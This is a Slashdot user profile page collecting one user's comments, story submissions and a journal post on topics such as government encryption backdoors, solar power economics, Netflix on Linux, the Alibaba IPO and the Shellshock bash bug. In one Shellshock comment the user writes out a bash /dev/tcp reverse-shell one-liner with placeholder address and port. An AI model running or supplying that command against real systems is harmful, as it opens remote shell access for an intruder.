Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Comments

top

Obama Administration Argues For Backdoors In Personal Electronics

DarkOx Backdoors are a threat to national security (443 comments)

Backdoors are a threat to national security; because there is ALWAYS a risk they will be discovered by other parties or that the mechanism for their operation will prove to be exploitable.

That could leave us in a situation where an enemy, very likely even an enemy without state resources could find themselves in a position where they can disrupt/eavesdrop/other wise access just about all non-military equipment. Its terrible idea when we face threats like ISIS to deliberately weaken our information security posture. It could be economically crippling.

I am leaving out all arguments about civil liberties basic freedoms etc because the Intelligence committee types, and the FUCKING FREEDOM HATING ASSHOLES like Holder don't care about those arguments.

It comes down to this while backdoor the whole world might prevent a tiny number of crimes against children it puts the entire American way of life at risk. We had this conversation before in the 90's with Skipjack and our society made the right choice back then, for whatever reasons wrong or right. It was only 20 some years ago, the world has not changed that much; this is not the time to re-evaluate this.

Holder is bad rubbish and its good a thing he will soon be gone.

9 hours ago
top

Tetris To Be Made Into a Live Action Film

DarkOx Re:April Fools? (135 comments)

That was my initial reaction but then Tetris' total lack of plot and cannon also gives the writers near total freedom.

I mean hell you could make a movie about a struggling deliver service improving their efficiency through better packing efficiency and call it Tetris.

yesterday
top

Apple Fixes Shellshock In OS X

DarkOx Re:I have an idea (163 comments)

I think you are correct on this point, I was a little too quick. Still I suspect there would be issues; which people who make heavy use of the shell would 'feel'

Consider ssh->bash->screen->bash. The first bash will be a login shell that sources the profile, the second will be a subshell, and would no longer have the functions defined. Sure there are plenty of ways to 'solve' that problem but will certainly require some alterations to common work flows.

yesterday
top

Energy Utilities Trying To Stifle Growth of Solar Power

DarkOx Re:Fine. Legislate for externalities. (475 comments)

Whoa I did not advise anything other than caution.

There is plenty of evidence a transition of some kind will take place. Simple physics tells us its going to be most efficient to use energy as near to where its produces as possible. We know real soon now (because its already the case; electric/hybrid cars) we are going to have reasonable capacity storage devices all over the place.

So something is going to happen.

because the rich simply don't spend much money on energy

They spend lots on energy, certainly lots more than the poor do, as a percentage of their income no its not as much but its more in absolute terms. I have a relative who's house is approx 13,000sqft + a carriage house that is about another 2500sqft of finished space or so. I can tell this person spends more on A/C in the summer than I have paid for my last two NEW cars.

This is my point; that is the sort of individual who is going to look at the costs and go, oh if I put in a battery room and a large solar array I can save all kinds of money, but that is also the person who can invest 30K all at once in doing that. That isn't an option for the paycheck to paycheck masses.

They will get stuck being slowly squeezed for more each month because they won't be able to get the capital together to buy their way out; until one day they won't be able to afford gird prices anymore and it will bye bye to 24-7 electricity for them.

2 days ago
top

Apple Fixes Shellshock In OS X

DarkOx Re:I have an idea (163 comments)

You mean like practically everyone's .profile

2 days ago
top

Apple Fixes Shellshock In OS X

DarkOx Re:Exploit that only affects Mac and Linux (163 comments)

Passing functions on environment variables is a feature, executing code after the function definition is parsing error.

As the article states is was never documented, and after trying really hard can't think of legitimate reasons to do it when there is a defined documented method for executing statements in the subshell via arguments "-c"

Which is not say, it was never done via someone doing some "clever" programing but if it was it probably was not a "good idea"

So no I think its bug, and a bit dishonest to try an spin it otherwise.

2 days ago
top

Apple Fixes Shellshock In OS X

DarkOx Re:Exploit that only affects Mac and Linux (163 comments)

Yes but the problem is and has always been Microsoft does not really use the NT security model but instead "re-implements" lots of controls in upper layers. Those layers in the past tended to be running with pretty high NT model privileges (that has gotten much better).

2 days ago
top

Apple Fixes Shellshock In OS X

DarkOx Re:that was fast (163 comments)

Not sure on the exact details of OSX DHCP handling (did not dig through it all) but no it was not vulnerable, based on a quick empirical test.

2 days ago
top

Energy Utilities Trying To Stifle Growth of Solar Power

DarkOx Re:Fine. Legislate for externalities. (475 comments)

Well that is the trouble with the planned economy model, but the poster does have a point. One of the "nice" things we can say about life in the USA is that pretty much everyone has access to affordable electricity.

You have be truly dirt poor before you get the point where you can't keep the lights on.

The more folks decided they can live without the grid, which is a decision people would make, hmm $20 a month or possibly a day or so without electricity somtime in the future while the solar installation techs get out to replace my inverter...

Many people will chose to go off grid. People with the wherewithal to make the capital investment. That will start to make the cost of staying connect higher for those who remain because the total miles of cable the power company has to maintain won't be shrinking much. It will feedback, as costs go up more people will make the investment in disconnecting.

That means those who can't make that investment get left behind, if nothing else comes along to further disrupt things eventually their may be no electrical utility (it won't be profitable to run one, when the only customers you have left are those most likely to default on their bills).

So we do need think about how to manage this transition, and as much as it pains me to say it, that probably does require 'government action' because I don't think we as a society really want to move backward to where there are haves and have nots when it comes to affordable electricity.

2 days ago
top

Bash To Require Further Patching, As More Shellshock Holes Found

DarkOx Re:There are no "remote" exploits for bash (326 comments)

Yes CGI is the common vector you are seeing lots of on the internet, but the greater threat I think to many users is dhcp.

If you have a Linux box that you get a dhcp address from GET IT PATCHED NOW.

Anyone can stand up a rouge DHCP server on most networks. Corporate environments might be slightly safer IFF they are well run. That is dhcp snooping is enabled on all the edge switches along with port security so you can know there are no addition dump hubs/switches daisy chained.

Otherwise DHCP options are passed as environment variables to the DHCP hook scripts on the client, even the default debug script that just returns if DEBUG is not set, and ships with dhclient would be vulnerable because the environment is parsed before any script content. You are walking around with a remote root exploit!

2 days ago
top

Bash To Require Further Patching, As More Shellshock Holes Found

DarkOx Re:There are no "remote" exploits for bash (326 comments)

Umm bash does indeed have network capabilities and I use them for getting reverse shells all the time.

It can be compiled without it but in general its present on most linux systems.

echo $(bash -i >& /dev/tcp/x.x.x.x/yyyy 0>&1)

Where x.x.x.x is the ip and yyyy is the port you want to send the shell to, you can use a netcat listener on the remote host.

2 days ago
top

Popular Wi-Fi Thermostat Full of Security Holes

DarkOx Re:Will this internet of things die already? (103 comments)

Which is completely meaningless. My energy bills can easily vary that much over a year depending weather conditions; without me doing anything around my own behavior. $300 in the typical ~2500 ft suburban home over a the course of an entire year is indistinguishable from noise.

about a week ago
top

Popular Wi-Fi Thermostat Full of Security Holes

DarkOx Re:Will this internet of things die already? (103 comments)

Seriously how many times will it take one of these things running the heat or AC constantly either because its a badly built hunk of crap or because someone pwned it before they wish they'd have stuck with their 10 year old setback?

about a week ago
top

Why a Chinese Company Is the Biggest IPO Ever In the US

DarkOx Re:Alibaba's AliExpress store is ripe with fakes (191 comments)

If he actually cares about decent hard working Americans he saves Amazon because Amazon investors at least own the company and Amazon is a US company providing a useful potentially profitable service.

Alibaba investors on the other hand are Wall Street gamblers who don't actually own anything other than some moon beam and unicorn promises that Alibaba really will distribute its profits to the Cayman islands company they actually own. That also presupposes the Chinese government won't just decide the whole arrangement isn't legal in the first place.

 

about two weeks ago
top

Why a Chinese Company Is the Biggest IPO Ever In the US

DarkOx Re:Why is Alibaba selling IPO in USA? (191 comments)

I know I can't believe this facts are being so under reported myself. The Alibaba management or the Chinese government (which probably could no matter what) is basically able to do just about anything they want and completely screw the investors who will be left with essentially no recourse legal or otherwise.

Its crazy to get into this deal where equity investors have essentially no rights or claim.

The cynic in me thinks the institutional guys buying up this IPO know this perfectly well and plan to unload it all on the retail folks before the next show drops. This deal stinks in so many ways; hopefully good people and their 401k managers will have enough sense to stay the hell away from it.

about two weeks ago
top

Native Netflix Support Is Coming To Linux

DarkOx Re:But the movie selection still sucks (178 comments)

I agree I like Netflix a lot. $8 a month is a bargain compared to pretty much every other option.

I am going to go see the major "Block Buster" titles I am actually interested ( maybe three of four a year ) at the cinema with buddies; those are social events and quite honestly, (/me ducks the incomming flames) movies like Avengers while good are only great out with pals. Take the social component away and try watching the film alone in your living room and its far less compelling.

Maybe its because I don't generally watch movies for the sake who can show me the most photo real destruction of NYC and the occasional boom mike or obvious cardboard cutout in the shot does not ruin the suspension of disbelief for me; but I find that many of the Indie stuff Netflix offers me is just as entertaining as the AAA stuff Hollywood churns out. In the end that is what I want out of it to relax and be entertained.

Rating everything definitely helps you get good suggestions and the flat rate all you can eat model makes it safe to take a chance on something. If after 30min you find you are not enjoying a flick switch to something else and you are not out anything more than a little time. Even placing $2 bets on iTunes or something you could easily exceed the cost of Netflix without having had much fun to show for it.

about two weeks ago
top

Native Netflix Support Is Coming To Linux

DarkOx Re:When will it work in Seamonkey and Firefox (178 comments)

I listed SeaMonkey first for a reason that is the browser I use. First because it comes with a mail client that runs in process, and I need a mail client running most of the time anyway. The IRC client is not great but its useable. Finally the browser UI itself is sane, If you get rid the "home" bar which you can the interface is not cluttered but does put the tools you need for the web at your finger tips; rather than hiding them.

I don't get the minimalist interface crap, no I don't need fifty bars and side panels, but there is plenty of room for useful things like the address bar, status bar, and menu bar + nav buttons. Why that can't be displayed with a "full screen mode" option for when you really need the space is baffling to me. Did everyone go back to 640x480 and not send me the memo or something?

I basically included Firefox because its the same HTML rendering engine underneath so when one gets support the other browser will as well; and if you don't want to use SeaMonkey for some reason the Firefox UI can be "fixed" with a few plugins.

Thanks for pointing out the issue is EME; was not sure what the missing feature secret sauce was. Now I'll know what to watch for in the change logs!

about two weeks ago
top

Native Netflix Support Is Coming To Linux

DarkOx When will it work in Seamonkey and Firefox (178 comments)

When will it work in Seamonkey and Firefox; that is what I care about, Chrome's interface sucks! and I don't want to run two browsers.

about two weeks ago
top

On Independence for Scotland:

DarkOx Re:Shetland and Orkney (192 comments)

often if you are on the wrong side of a revolution you are a criminal.

That might be true but that isn't really what we are talking about here. A peaceful succession following a vote is not a revolution.

If you have a criminal record often presto you can't travel internationally

Yes if you have demonstrated you are unable to follow the rules of your society you loose rights in that society. No shock there and unless we are talking about specific laws that were decidedly unjust its hard to get morally outraged. I am not an expert on the UK or Canada; but neither are exactly known for examples such as systemic institutionalized, racism, religious oppression, etc, at least not in the previous couple generations. So its hard to get normally outraged by this "issue" in these contexts.

if you own property, you are your kids are part way through an education etc

Wow how very entitled, what about all those folks who own property, have kids part way though education etc that do want to succeed? Are their well being, needs, and desires less important than yours? This gets directly back to that democracy thing, not everyone is going to like every outcome, that is a given in any system. At least with a democratic system you get some say, you get to try and convince a plurality of others your way of thinking is best. If you can great, if not well those are the breaks. Hopefully the "winners" remember they are not always going to be and mike some allowances and concessions for the minority.

about two weeks ago

Submissions

top

NSA not Assad brought down Internet in Syria

DarkOx DarkOx writes  |  about a month and a half ago

DarkOx (621550) writes "In his most recent interview with Wired Edward Snowden makes the claim that in 2012, the NSAâ(TM)s TAO hacking group was attempting to install surveillance malware when it accidentally brought down a crucial router at a Syrian Internet service provider, and the nation's Internet connectivity with it.

The NSA allowd the public to blame the Assad regime, while others within the NSA apparently considered pointing the finger at Israel for the botched intrusion. This revelation raises even more questions about the legality of the NSA actions, as they would seem to be very similar to electronic atacks other officials have suggested the USA would consider acts of war if used against infrastructure based in the USA.

Could the reckless behavior by the NSA cause our nation to be drawn into war?"

Link to Original Source
top

Anonymous Vows to Destroy Facebook

DarkOx DarkOx writes  |  more than 3 years ago

DarkOx (621550) writes "Anonymous has vowed to destroy Facebook on November 5th (which should ring a bell).

Citing privacy concerns and the difficulty involved in deleting a Facebook account.

From: Anonymous posting:
Attention citizens of the world,
We wish to get your attention, hoping you heed the warnings as follows:
Your medium of communication you all so dearly adore will be destroyed. If you are a willing hacktivist or a guy who just wants to protect the freedom of information then join the cause and kill facebook for the sake of your own privacy."

Link to Original Source
top

Slackware.com is gone

DarkOx DarkOx writes  |  more than 3 years ago

DarkOx (621550) writes "It appears the domain registration of Slackware.com the oldest commerical GNU/Linux distributions has expired. Is this a simple oversite on the part of Slackware's maintainer Patrick Volkerdi or is this a diliberate retirement of many peoples favorite distribution?"
Link to Original Source
top

Jessica Watson sets sail

DarkOx DarkOx writes  |  more than 4 years ago

DarkOx (621550) writes "Jessica Watson has begun her round the world voyage, if successful she will be the youngest person, age 16, to circumnavigate the globe by sail unassisted and non-stop.

She will 23,000 nautical miles (about 38,000 kilometres), departing and returning to Sydney as required to set the record. This will be a journey lasting around 240 days, during which she may not acquire any outside supplies or receive any assistance with repairs.

She will have internet access, e-mail, and her position will be continuously tracked and monitored. This is a pretty high tech undertaking both in the electronics sense and as in sailing kit. Her yacht is a S&S (Sparkman and Stephens) 34 a boat that has successfully been used in other solo circumnavigation bids.

Much more information can be found at her website: http://www.jessicawatson.com.au/"

Link to Original Source

Journals

top

Hypocrisy and the Contraception debate

DarkOx DarkOx writes  |  more than 2 years ago

Since apparently we have to decide the future of American politics around this issue of whether insurers should be forced to offer contraceptives and pharmacies be forced to carry them the freedom or religion question again comes to the forefront.

The progressive propaganda machine is out in full force trying to accuse conservatives of forcing their religion on others and or trying to sell us all on the idea that these measures are in some way protecting them from the tyrannical religious views of the minority. The sad part is its working in that public is actually entertaining the idea this has anything to do with religion. It may be to an extent but if is than the conservatives as usual have the more supportable position even if most of those would be ïïSantorum votes and the candidate himself are blind to it.

All of these âoeprogressivesâ who see their boy Obama as a hero pushing common sense over the religious right, are as much the fools they like to make the Santorum supporters out to be or the worst kind of hypocrite. I personally suspect its pretty even mix of both; frequently found in the same individuals. Almost any of them would be willing to argue that âoefreedom of religionâ means freedom from religion and Iâ(TM)d agree. It follows though that âoefreedom of associationâ its in that same amendment, should also mean freedom from association. That means as an individual, or private business, I should have the right to disassociate myself form any person or group of people I chose for any reason, however stupid. This is the view I take as libertarian. Its incumbent upon me to not pick stupid reasons but if I do; well to damn bad right? So if an employer, insurance agency or pharmacy does not want the sort of customer or employee that interested in contraception coverage well that ought to be allowed. So toss out all your civil rights acts, quota laws, and similar non-egalitarian derk.

The Supreme Court of the United States disagrees with me; partially. The have held you can only exclude members from your group if their presence would make it difficult to express you view point. Clearly in the case of Catholic organizations who have the view point that contraception is wrong, would have a problem espousing that viewpoint while having a membership with the expectation they are going to pay for it. So their covered but the pharmacy that does not want to carry Plan B, they are not a religious organization, the are not pushing an agenda other than make buck; so they canâ(TM)t just dissociate themselves from a certain group of customers right? Well I guess you got me there, or do you? I say the the Supreme Court is wrong. I say this because if the the freedom of associate is in fact not freedom from association than its terribly inconsistent to take the view freedom of religion is.

If your not forcing people to violate the tenants of their own faith with say biblical-y inspired laws than those must be okay, as that would be consistent with the Courts rulings on association. Sorry Atheists if the Christians want to hang the Ten Commandments over the door and start the school day with a prayer I guess you must let them. You canâ(TM)t have it both ways, well not and be honest anyway. Lets face it honesty and integrity have never really been part of the progressive agenda though have they?

  hmm some other thoughts on the subject.

What about the basic freedom reserved for the states and the people, you know ALL the ones not enumerated elsewhere in the Constitution. Like say deciding what to stock in your store. If a pharmacy has to carry Plan B, does my auto mechanic have to stock parts for my thirty year old import? Does JC Penny have to have beige pants in a thirty-one inch waste in stock at all times? Where is line? Clearly its totally against the character of this nation for any central governing body to be dictating what a retail operation has on their shelves, at least I hope that is still true!

Finally can we just dispense with the totally ridiculous notion that contraceptive drugs are âoenecessary for womenâ(TM)s health.â Clearly when prescribed for âoecontraceptive useâ they are not. Effective inexpensive contraception for men and women is available at just about every gas station, drug store, and many a public rest room across this country. If you really canâ(TM)t of any of it for whatever reason you could just keep your pants on. Sure it might ruin a Saturday night but it wonâ(TM)t kill you. I would be willing to entertain an argument that these medications might be necessary when prescribed as they frequently are for other health reasons. Doing so than places it on the doctor writing the prescription and their professional integrity when they attest to why they are doing it. Seems like a reasonable compromise. This simply is not an equal protection issue. Its just not.

Lets face it contraception is NOT specifically a womenâ(TM)s issue unless fathers have no obligation or rights to the consequences of not using it. Oh wait nobody is happy with that idea? Thought not.

Slashdot Login

Need an Account?

Forgot your password?